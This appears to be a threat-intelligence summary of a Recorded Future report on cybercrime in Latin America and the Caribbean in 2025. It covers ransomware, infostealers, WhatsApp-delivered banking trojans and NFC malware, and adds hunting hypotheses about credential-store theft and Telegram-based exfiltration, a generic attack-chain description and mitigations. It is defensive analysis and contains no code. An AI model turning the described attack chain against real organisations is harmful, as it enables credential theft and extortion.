Latin America and the Caribbean Cybercrime Landscape
In 2025, the Latin America and the Caribbean (LAC) region faced escalating cybercriminal activity driven by rapid digital adoption and economic instability. Threat actors heavily utilized Telegram and dark web forums to distribute ransomware, banking trojans, and infostealers, increasingly targeting the healthcare, manufacturing, and government sectors while adapting to law enforcement disruptions.
Authors: Insikt Group, Recorded Future
Source:
Recorded Future
- urlhxxps://transparenciapresupuestaria[.]hermosillo[.]gob[.]mxWebsite defaced by the Chronus Team hacktivist group (identified via image analysis)
Key Takeaways
- DarkForums and Telegram are the primary communication and special-access platforms for threat actors targeting the LAC region.
- Healthcare, manufacturing, and government were the top industries targeted by ransomware in LAC, with 452 incidents recorded in 2025.
- LummaC2 was the most prolific infostealer in H1 2025, followed by Vidar in H2 after LummaC2 faced law enforcement disruption.
- Banking trojans increasingly leverage WhatsApp for delivery, targeting the region's heavy reliance on mobile banking and Android devices.
- Novel NFC-exploiting malware like PhantomCard and RelayNFC are emerging to target contactless payment systems in Brazil.
Affected Systems
- Android mobile devices
- Windows OS
- Healthcare systems
- Government networks
- Financial sector infrastructure
- Contactless payment systems (NFC/POS)
- SOHO routers and IoT appliances
Attack Chain
Threat actors typically gain initial access via phishing (email, SMS, WhatsApp) or by exploiting exposed credentials and vulnerable remote access infrastructure (RDP, VPNs). Once inside, they deploy infostealers (like LummaC2 or Vidar) to harvest credentials or banking trojans to intercept financial transactions. For extortion, actors escalate privileges, exfiltrate sensitive data, and deploy ransomware payloads, utilizing double-extortion tactics to force payment.
Detection Availability
- YARA Rules: Yes
- Sigma Rules: Yes
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Recorded Future Insikt Group
The report indicates that Recorded Future's Insikt Group has developed YARA rules for detecting the Mispadu banking trojan and Sigma rules for detecting the Astaroth (Guildma) malware.
Detection Engineering Assessment
EDR Visibility: High — EDR solutions are highly effective at detecting the execution of known infostealers, banking trojans, and ransomware payloads, as well as the behavioral anomalies associated with credential dumping and file encryption. Network Visibility: Medium — While C2 communication can be detected, threat actors heavily utilize end-to-end encrypted messaging platforms like Telegram and WhatsApp, which obscures payload delivery and C2 traffic. Detection Difficulty: Moderate — The reliance on established malware families (LummaC2, Vidar, Grandoreiro) provides known signatures and behaviors, but the use of legitimate platforms (WhatsApp, Telegram) for distribution and C2 complicates network-level detection.
Required Log Sources
- Process Creation (Event ID 4688)
- Network Connections
- File System Changes
- DNS Queries
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for unusual outbound network connections from endpoint devices to Telegram API endpoints, which may indicate C2 communication or data exfiltration by infostealers. | Network flow logs, DNS queries | Command and Control | High (if Telegram is permitted for corporate use) |
| Search for suspicious child processes spawned by PDF readers or web browsers, particularly those executing PowerShell or downloading ZIP/ISO files, indicating potential banking trojan delivery. | EDR process telemetry | Execution | Low |
| Monitor for unexpected modifications to browser credential stores or cryptocurrency wallet files, which are primary targets for infostealers like LummaC2 and Vidar. | File integrity monitoring, EDR file events | Credential Access | Low |
Control Gaps
- Lack of MFA on SaaS and remote access platforms
- Unrestricted use of WhatsApp/Telegram on corporate devices
- Legacy infrastructure and unpatched VPN/RDP gateways
Key Behavioral Indicators
- Execution of sideloaded APKs on Android devices
- Unexpected PowerShell execution from compressed archives
- Rapid, large-scale file encryption events
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Enforce Multi-Factor Authentication (MFA) across all remote access points (VPN, RDP) and SaaS applications.
- Block or restrict the use of unauthorized encrypted messaging apps (Telegram, WhatsApp) on corporate devices.
Infrastructure Hardening
- Update and patch legacy systems, particularly public-facing infrastructure and VPN gateways.
- Implement 'secure by design' principles and segment critical networks, especially in healthcare and government sectors.
User Protection
- Deploy Mobile Device Management (MDM) solutions to prevent the sideloading of unverified APKs on corporate mobile devices.
- Enhance endpoint protection to detect and block known infostealers and banking trojans.
Security Awareness
- Conduct targeted security awareness training focusing on localized phishing lures, WhatsApp-based social engineering, and the risks of downloading unofficial applications.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1078 - Valid Accounts
- T1190 - Exploit Public-Facing Application
- T1056 - Input Capture
- T1555 - Credentials from Password Stores
- T1041 - Exfiltration Over C2 Channel
- T1486 - Data Encrypted for Impact